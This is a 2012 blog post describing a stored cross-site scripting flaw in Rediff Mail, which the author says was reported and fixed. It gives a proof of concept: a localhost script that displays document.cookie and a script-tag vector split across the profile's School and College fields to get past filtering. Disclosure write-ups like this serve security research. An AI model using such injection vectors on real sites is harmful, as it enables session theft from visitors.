Monday, November 12, 2012

Stored XSS On Rediff Mail

Hi Guys, I recently discovered Stored XSS Issue on Rediff mail and also reported this issue to Rediff Recently. :-)
But didn't get any Credit but Still never mind.
They actually dropped me mail on personal id that issue has been fixed now.
I will show exact demonstration of that Stored XSS issue.
But, First of all i will tell you what XSS is basically.

XSS (Cross-Site Scripting)-
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. 
There are basically two types of XSS:
1) Reflected XSS Attacks
2) Stored XSS Attacks

So, Let  get Start with attack
Now, this is an extremely critical vulnerability as the user will be attacked by simply visiting malicious user profile and the malicious script will execute on the victim browser.
Here is a proof of concept  of Stored XSS on Rediffmail:)
1)Hosted JavaScript File locally
with following content:
"document.write ("Stored XSS " + document.cookie);
alert ("cookie Value" + document.cookie);
"
Hosted JavaScript for XSS:Securityvin32
2)Parameter Affected: School and college combined
Here is the tricky part i faced during XSS
here individual school and college parameter didn't get xss alert.
So i tried to combined both field by using following vector:
School:
/><SCRIPT SRC="http://localhost/xss/xss.js"/*
College: 
*/></SCRIPT>

3) After saving the attack vector in his profile.
Any user who visit attacker profile will get malicious script executed on his browser.